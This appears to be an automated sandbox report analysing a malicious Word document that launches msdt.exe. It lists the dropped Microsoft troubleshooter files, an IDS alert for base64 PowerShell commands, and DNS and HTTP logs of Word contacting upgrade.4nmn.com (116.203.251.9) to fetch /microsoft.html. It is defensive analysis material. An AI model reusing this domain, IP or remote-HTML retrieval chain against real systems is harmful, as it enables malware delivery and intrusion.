                                                                                                                                                                Preview:..........D.o.m.a.i.n. . . . . . . . . . . . . . .:. .m.s.l.M.V.....M.a.n.u.f.a.c.t.u.r.e.r. . . . . . . . .:. .T.E.r.b.5.k.1.b.Z.Z.N.4.8.4.m.....M.o.d.e.l. . . . . . . . . . . . . . . .:. . .h. .f.m.2.D.f.....N.a.m.e. . . . . . . . . . . . . . . . .:. .D.E.S.K.T.O.P.-.7.1.6.T.7.7.1.....P.r.i.m.a.r.y.O.w.n.e.r.N.a.m.e. . . . .:. .p.r.a.t.e.s.h.....T.o.t.a.l.P.h.y.s.i.c.a.l.M.e.m.o.r.y. .:. .4.2.9.3.9.4.3.2.9.6.................
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):24702
                                                                                                                                                                Entropy (8bit):4.37978533849437
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
                                                                                                                                                                MD5:191959B4C3F91BE170B30BF5D1BC2965
                                                                                                                                                                SHA1:1891E3CB588516B94FDC53794DA4DF5469A4C6D0
                                                                                                                                                                SHA-256:8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
                                                                                                                                                                SHA-512:092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):66560
                                                                                                                                                                Entropy (8bit):6.926109943059805
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:ytBGLADXf3iFGQ+/ReBQBJJgUKZgyxMBGb:ytBGcDXvKoRqKuxgyx
                                                                                                                                                                MD5:6E492FFAD7267DC380363269072DC63F
                                                                                                                                                                SHA1:3281F69F93D181ADEE35BC9AD93B8E1F1BBF7ED3
                                                                                                                                                                SHA-256:456AE5D9C48A1909EE8093E5B2FAD5952987D17A0B79AAE4FFF29EB684F938A8
                                                                                                                                                                SHA-512:422E2A7B83250276B648510EA075645E0E297EF418564DDA3E8565882DBBCCB8C42976FDA9FCDA07A25F0F04A142E43ECB06437A7A14B5D5D994348526123E4E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.PE..d....J_A.........." ......................................................... .......K....`.......................................................... ..`...............................8............................................................................rdata..............................@..@.rsrc...`.... ......................@..@.....J_A........T...8...8........J_A........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#.......rsrc$02.... .....;A.(.j..x..)V...Zl4..w.E..J_A........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):50242
                                                                                                                                                                Entropy (8bit):4.932919499511673
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:/wugEs5GhrQzYjGBHvPbD9FZahXuDzsP6qqF8DdEakDiqeXacgcRjdhGPtQMHQF4:/c5AMHvDDf2VE+quAiMw4
                                                                                                                                                                MD5:EDF1259CD24332F49B86454BA6F01EAB
                                                                                                                                                                SHA1:7F5AA05727B89955B692014C2000ED516F65D81E
                                                                                                                                                                SHA-256:AB41C00808ADAD9CB3D76405A9E0AEE99FB6E654A8BF38DF5ABD0D161716DC27
                                                                                                                                                                SHA-512:A6762849FEDD98F274CA32EB14EC918FDBE278A332FDA170ED6D63D4C86161F2208612EB180105F238893A2D2B107228A3E7B12E75E55FDE96609C69C896EBA0
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#This is passed from the troubleshooter via 'Add-DiagRootCause'..PARAM($targetPath, $appName)....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008..#rfink - 01 Sept 2008 - rewrite to support dynamic choices....#set-psdebug -strict -trace 0....#change HKLM\Software\Windows NT\CurrentVersion\AppCompatFlags\CompatTS EnableTracing(DWORD) to 1..#if you want to enable tracing..$SpewTraceToDesktop = $false....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....#Compatibility modes..$CompatibilityModes = new-Object System.Collections.Hashtable..$CompatibilityModes.Add("Version_WIN8RTM", "WIN8RTM")..$CompatibilityModes.Add("Version_WIN7RTM", "WIN7RTM")..$CompatibilityModes.Add("Version_WINVISTA2", "VISTASP2")..$CompatibilityModes.Add("Version_WINXP3", "WINXPSP3")..$CompatibilityModes.Add("Version_MSIAUTO", "MSIAUTO")..$CompatibilityModes.Add("Version_UNKNOWN", "WINXPSP3")..$Comp
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16946
                                                                                                                                                                Entropy (8bit):4.860026903688885
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:3FptgXhu9IOM7BTDLwU7GHf7FajKFzB9Ww:Ghu9I9dQYWB9Ww
                                                                                                                                                                MD5:2C245DE268793272C235165679BF2A22
                                                                                                                                                                SHA1:5F31F80468F992B84E491C9AC752F7AC286E3175
                                                                                                                                                                SHA-256:4A6E9F400C72ABC5B00D8B67EA36C06E3BC43BA9468FE748AEBD704947BA66A0
                                                                                                                                                                SHA-512:AAECB935C9B4C27021977F211441FF76C71BA9740035EC439E9477AE707109CA5247EA776E2E65159DCC500B0B4324F3733E1DFB05CEF10A39BB11776F74F03C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#TS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....$ShortcutListing = New-Object System.Collections.Hashtable..$ExeListing = New-Object System.Collections.ArrayList..$CombinedListing = New-Object System.Collections.ArrayList....Import-LocalizedData -BindingVariable CompatibilityStrings -FileName CL_LocalizationData....# Block PCW on unsupported SKUs..$BlockedSKUs = @(178)..[Int32]$OSSKU = (Get-WmiObject -Class "Win32_OperatingSystem").OperatingSystemSKU..if ($BlockedSKUs.Contains($OSSKU))..{.. return..}....$typeDefinition = @"....using System;..using System.IO;..using System.Runtime.InteropServices;..using System.Text;..using System.Collections;....public class Utility..{.. public static string GetStartMenuPath().. {.. return Environment.GetFolderPath(Environment.SpecialFolder.StartMenu);.. }.... public static string GetAllUsersStartMenuPath().. {.. return Path.Combine(Environ
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:ISO-8859 text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):4.983419443697541
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:QcM3BFN+dxmVdyKVCkLZI4S2xhzoJNIDER5lI02xzS4svc3uVr:Qb3DQbeCklTxhzoJUoS02tCr
                                                                                                                                                                MD5:60A20CE28D05E3F9703899DF58F17C07
                                                                                                                                                                SHA1:98630ABC4B46C3F9BD6AF6F1D0736F2B82551CA9
                                                                                                                                                                SHA-256:B71BC60C5707337F4D4B42BA2B3D7BCD2BA46399D361E948B9C2E8BC15636DA2
                                                                                                                                                                SHA-512:2B2331B2DD28FB0BBF95DC8C6CA7E40AA56D4416C269E8F1765F14585A6B5722C689BCEBA9699DFD7D97903EF56A7A535E88EAE01DFCC493CEABB69856FFF9AA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:# Copyright . 2008, Microsoft Corporation. All rights reserved.......#if this environment variable is set, we say that we don't detect the problem anymore so it will..#show as fixed in the final screen..PARAM($appName)....$detected = $true..if ($Env:AppFixed -eq $true)..{.. $detected = $false ..}....Update-DiagRootCause -id "RC_IncompatibleApplication" -iid $appName -Detected $detected....#RS_ProgramCompatibilityWizard..#rparsons - 05 May 2008....
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6650
                                                                                                                                                                Entropy (8bit):3.6751460885012333
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:q39pB3hpieJGhn8n/y7+aqwcQoXQZWx+cWUcYpy7I6D1RUh5EEjQB5dm:q39pRhp6Sy6wZifVEtjjFm
                                                                                                                                                                MD5:E877AD0545EB0ABA64ED80B576BB67F6
                                                                                                                                                                SHA1:4D200348AD4CA28B5EFED544D38F4EC35BFB1204
                                                                                                                                                                SHA-256:8CAC8E1DA28E288BF9DB07B2A5BDE294122C8D2A95EA460C757AE5BAA2A05F27
                                                                                                                                                                SHA-512:6055EC9A2306D9AA2F522495F736FBF4C3EB4078AD1F56A6224FF42EF525C54FF645337D2525C27F3192332FF56DDD5657C1384846678B343B2BFA68BD478A70
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:..#. .L.o.c.a.l.i.z.e.d...0.4./.1.1./.2.0.1.8. .0.2.:.0.5. .P.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....#. .L.o.c.a.l.i.z.e.d...0.1./.0.4./.2.0.1.3. .1.1.:.3.2. .A.M. .(.G.M.T.)...3.0.3.:.4...8.0...0.4.1.1. ...C.L._.L.o.c.a.l.i.z.a.t.i.o.n.D.a.t.a...p.s.d.1.....C.o.n.v.e.r.t.F.r.o.m.-.S.t.r.i.n.g.D.a.t.a. .@.'.....#.#.#.P.S.L.O.C.....P.r.o.g.r.a.m._.C.h.o.i.c.e._.N.O.T.L.I.S.T.E.D.=.N.o.t. .L.i.s.t.e.d.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.D.E.F.A.U.L.T.=.N.o.n.e.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.8.R.T.M.=.W.i.n.d.o.w.s. .8.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.7.R.T.M.=.W.i.n.d.o.w.s. .7.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.V.I.S.T.A.2.=.W.i.n.d.o.w.s. .V.i.s.t.a. .(.S.e.r.v.i.c.e. .P.a.c.k. .2.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.W.I.N.X.P.S.P.3.=.W.i.n.d.o.w.s. .X.P. .(.S.e.r.v.i.c.e. .P.a.c.k. .3.).....V.e.r.s.i.o.n._.C.h.o.i.c.e._.M.S.I.A.U.T.O.=.S.k.i.p. .V.e.r.s.i.o.n. .C.h.e.c.k.....V.e.r.s.i.o.n._.C.h.o.i.c.e._.U.N.
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):10752
                                                                                                                                                                Entropy (8bit):3.517898352371806
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:Gmw56QoV8m7t/C7eGu7tCuKFtrHQcoC1dIO4Pktmg5CuxbEWgdv0WwF:WAQovu548tmirAWu8Wm
                                                                                                                                                                MD5:CC3C335D4BBA3D39E46A555473DBF0B8
                                                                                                                                                                SHA1:92ADCDF1210D0115DB93D6385CFD109301DEAA96
                                                                                                                                                                SHA-256:330A1D9ADF3C0D651BDD4C0B272BF2C7F33A5AF012DEEE8D389855D557C4D5FD
                                                                                                                                                                SHA-512:49CBF166122D13EEEA2BF2E5F557AA8696B859AEA7F79162463982BBF43499D98821C3C2664807EDED0A250D9176955FB5B1B39A79CDF9C793431020B682ED12
                                                                                                                                                                Malicious:false
                                                                                                                                                                Antivirus:
                                                                                                                                                                 • Antivirus: Metadefender, Detection: 0%
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........<...R...R...R.......R...P...R.Rich..R.................PE..L..................!.........(...............................................P...........@.......................................... ...$..............................8............................................................................rdata..............................@..@.rsrc....0... ...&..................@..@......E.........T...8...8.........E.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....#..0!...rsrc$02.... .......OV....,.+.(,..vA..@..E.........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                Process:C:\Windows\SysWOW64\msdt.exe
                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):48956
                                                                                                                                                                Entropy (8bit):5.103589775370961
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:hUeTHmb0+tk+Ci10ycNV6OW9a+KDoVxrVF+bBH0t9mYNJ7u2+d:hUcHXDY10tNV6OW9abDoVxrVF+bBH0tO
                                                                                                                                                                MD5:310E1DA2344BA6CA96666FB639840EA9
                                                                                                                                                                SHA1:E8694EDF9EE68782AA1DE05470B884CC1A0E1DED
                                                                                                                                                                SHA-256:67401342192BABC27E62D4C1E0940409CC3F2BD28F77399E71D245EAE8D3F63C
                                                                                                                                                                SHA-512:62AB361FFEA1F0B6FF1CC76C74B8E20C2499D72F3EB0C010D47DBA7E6D723F9948DBA3397EA26241A1A995CFFCE2A68CD0AAA1BB8D917DD8F4C8F3729FA6D244
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:<?xml version="1.0"?>..<?Copyright (c) Microsoft Corporation. All rights reserved.?>..<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:ms="urn:microsoft-performance" exclude-result-prefixes="msxsl" version="1.0">...<xsl:output method="html" indent="yes" standalone="yes" encoding="UTF-16"/>...<xsl:template name="localization">....<_locDefinition>.....<_locDefault _loc="locNone"/>.....<_locTag _loc="locData">String</_locTag>.....<_locTag _loc="locData">Font</_locTag>.....<_locTag _loc="locData">Mirror</_locTag>....</_locDefinition>...</xsl:template>... ********** Images ********** -->...<xsl:variable name="images">....<Image id="check">res://sdiageng.dll/check.png</Image>....<Image id="error">res://sdiageng.dll/error.png</Image>....<Image id="info">res://sdiageng.dll/info.png</Image>....<Image id="warning">res://sdiageng.dll/warning.png</Image>....<Image id="expand">res://sdiageng.dll/expand.png</Image>....<Image id="
                                                                                                                                                                File type:Microsoft OOXML
                                                                                                                                                                Entropy (8bit):7.762329445476857
                                                                                                                                                                TrID:
                                                                                                                                                                • Word Microsoft Office Open XML Format document (49504/1) 49.01%
                                                                                                                                                                • Word Microsoft Office Open XML Format document (43504/1) 43.07%
                                                                                                                                                                • ZIP compressed archive (8000/1) 7.92%
                                                                                                                                                                File name:WF0SlQWKr1.docx
                                                                                                                                                                File size:12519
                                                                                                                                                                MD5:783f850d06c9f1286eb9b1bda0af0bce
                                                                                                                                                                SHA1:08011884c9bed126b4cfbadad4a4be5063805230
                                                                                                                                                                SHA256:211a1f74eea68ebe7178d90f0df0446a87cdda865145c397b7a32e253086139e
                                                                                                                                                                SHA512:fcab796a185f90db166c6fc335dd54db3b51856b3daa46905fdfa5641ced9140ae18cf601e7b93a511c2d77b94e21bdddc7b2e23a49d358fb3960be781070a6f
                                                                                                                                                                SSDEEP:384:Fkv41E49wKxhpp+gX6eILI7RMobB/P/sQGwZRB98PG0S:evyE4aWfKetlV9PDXgA
                                                                                                                                                                TLSH:1D428D33C7074835D0ABBAB870D95483EA75CD45E9D2A09F3A94E2D04CE26EB1B0778D
                                                                                                                                                                File Content Preview:PK..........!....lR... .......[Content_Types].xml...N.1...M|.Mo.[......?.J">@ig...6.....e......l..9.|.d:..+.-!......'2.:..g.x.<voD...Q.x(..P......&.f..X.9Q.....*.y...R.T).c...............S.j.1..C.....5.nH.8..].Xg.B...V.u...KJw...r..s....B.L.+...t.|5....*.
                                                                                                                                                                Icon Hash:74fcd0d2d6d6d0cc
Timestamp                 Protocol  SID      Message                                   Source Port  Dest Port  Source IP      Dest IP
06/20/22-08:29:56.120422  TCP       2025011  ET TROJAN Powershell commands sent B64 2  443          49745      116.203.251.9  192.168.2.3
Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Jun 20, 2022 08:29:52.199393988 CEST  49734        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.199448109 CEST  443          49734      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.199541092 CEST  49734        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.201288939 CEST  49734        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.201313972 CEST  443          49734      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.276954889 CEST  443          49734      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.277107000 CEST  49734        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.301300049 CEST  49734        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.301326990 CEST  443          49734      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.301868916 CEST  443          49734      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.308511972 CEST  49734        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.335254908 CEST  443          49734      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.335345984 CEST  443          49734      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.335418940 CEST  49734        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.335467100 CEST  49734        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.335494041 CEST  443          49734      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.335509062 CEST  49734        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.335520029 CEST  443          49734      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.564659119 CEST  49735        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.564718962 CEST  443          49735      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.564810038 CEST  49735        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.567034006 CEST  49735        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.567063093 CEST  443          49735      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.623687983 CEST  443          49735      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.631222963 CEST  49735        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.631275892 CEST  443          49735      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.632443905 CEST  49735        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.632456064 CEST  443          49735      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.671315908 CEST  443          49735      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.671437979 CEST  443          49735      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.671528101 CEST  49735        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.690000057 CEST  49735        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.690041065 CEST  443          49735      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:52.690062046 CEST  49735        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:52.690080881 CEST  443          49735      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:55.742680073 CEST  49744        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:55.742734909 CEST  443          49744      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:55.742842913 CEST  49744        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:55.743011951 CEST  49744        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:55.743026972 CEST  443          49744      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:55.805716038 CEST  443          49744      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:55.806166887 CEST  49744        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:55.806202888 CEST  443          49744      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:55.807419062 CEST  49744        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:55.807430983 CEST  443          49744      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:55.853537083 CEST  443          49744      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:55.853630066 CEST  443          49744      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:55.853696108 CEST  49744        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:55.853740931 CEST  443          49744      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:55.853758097 CEST  49744        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:55.853777885 CEST  443          49744      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:55.853790045 CEST  49744        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:55.853797913 CEST  443          49744      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:56.014554024 CEST  49745        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.014609098 CEST  443          49745      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:56.014718056 CEST  49745        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.015355110 CEST  49745        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.015383959 CEST  443          49745      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:56.074003935 CEST  443          49745      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:56.074116945 CEST  49745        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.083441019 CEST  49745        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.083458900 CEST  443          49745      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:56.083966970 CEST  443          49745      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:56.084058046 CEST  49745        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.084482908 CEST  49745        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.120297909 CEST  443          49745      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:56.120349884 CEST  443          49745      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:56.120434999 CEST  443          49745      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:56.120451927 CEST  49745        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.120518923 CEST  49745        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.120526075 CEST  49745        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.120532036 CEST  49745        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.121470928 CEST  49745        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.121501923 CEST  443          49745      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:56.372096062 CEST  49746        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.372148037 CEST  443          49746      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:56.372262001 CEST  49746        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.372560978 CEST  49746        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:56.372586966 CEST  443          49746      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:57.450944901 CEST  443          49746      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:57.451168060 CEST  49746        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:57.451503992 CEST  49746        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:57.451523066 CEST  443          49746      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:57.454102993 CEST  49746        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:57.454133987 CEST  443          49746      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:57.498409986 CEST  443          49746      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:57.498507023 CEST  443          49746      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:57.498698950 CEST  49746        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:57.498743057 CEST  49746        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:57.498764038 CEST  49746        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:57.498790026 CEST  443          49746      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:57.498806953 CEST  49746        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:57.498889923 CEST  49746        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:57.678199053 CEST  49747        443        192.168.2.3    116.203.251.9
Jun 20, 2022 08:29:57.678247929 CEST  443          49747      116.203.251.9  192.168.2.3
Jun 20, 2022 08:29:57.678327084 CEST  49747        443        192.168.2.3    116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:57.678642988 CEST49747443192.168.2.3116.203.251.9
                                                                                                                                                                Jun 20, 2022 08:29:57.678651094 CEST44349747116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:57.741292000 CEST44349747116.203.251.9192.168.2.3
                                                                                                                                                                Jun 20, 2022 08:29:57.741420984 CEST49747443192.168.2.3116.203.251.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 20, 2022 08:29:52.110529900 CEST | 55923 | 53 | 192.168.2.3 | 8.8.8.8
Jun 20, 2022 08:29:52.183651924 CEST | 53 | 55923 | 8.8.8.8 | 192.168.2.3
Jun 20, 2022 08:29:55.947717905 CEST | 58116 | 53 | 192.168.2.3 | 8.8.8.8
Jun 20, 2022 08:29:56.012845039 CEST | 53 | 58116 | 8.8.8.8 | 192.168.2.3

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 20, 2022 08:29:52.110529900 CEST | 192.168.2.3 | 8.8.8.8 | 0x72f4 | Standard query (0) | upgrade.4nmn.com | A (IP address) | IN (0x0001)
Jun 20, 2022 08:29:55.947717905 CEST | 192.168.2.3 | 8.8.8.8 | 0xf8ea | Standard query (0) | upgrade.4nmn.com | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 20, 2022 08:29:52.183651924 CEST | 8.8.8.8 | 192.168.2.3 | 0x72f4 | No error (0) | upgrade.4nmn.com | (none) | 116.203.251.9 | A (IP address) | IN (0x0001)
Jun 20, 2022 08:29:56.012845039 CEST | 8.8.8.8 | 192.168.2.3 | 0xf8ea | No error (0) | upgrade.4nmn.com | (none) | 116.203.251.9 | A (IP address) | IN (0x0001)

• upgrade.4nmn.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49734 | 116.203.251.9 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-20 06:29:52 UTC | kBytes transferred: 0 | Direction: OUT
OPTIONS / HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
X-FeatureVersion: 1
X-MSGETWEBURL: t
X-IDCRL_ACCEPTED: t
Host: upgrade.4nmn.com

Timestamp: 2022-06-20 06:29:52 UTC | kBytes transferred: 0 | Direction: IN
HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST
Server: Microsoft-IIS/10.0
Public: OPTIONS, TRACE, GET, HEAD, POST
X-Powered-By: ASP.NET
Date: Mon, 20 Jun 2022 06:29:52 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49735 | 116.203.251.9 | 443 | C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

Timestamp: 2022-06-20 06:29:52 UTC | kBytes transferred: 0 | Direction: OUT
HEAD /microsoft.html HTTP/1.1
Connection: Keep-Alive
Authorization: Bearer
User-Agent: Microsoft Office Word 2014
X-Office-Major-Version: 16
X-MS-CookieUri-Requested: t
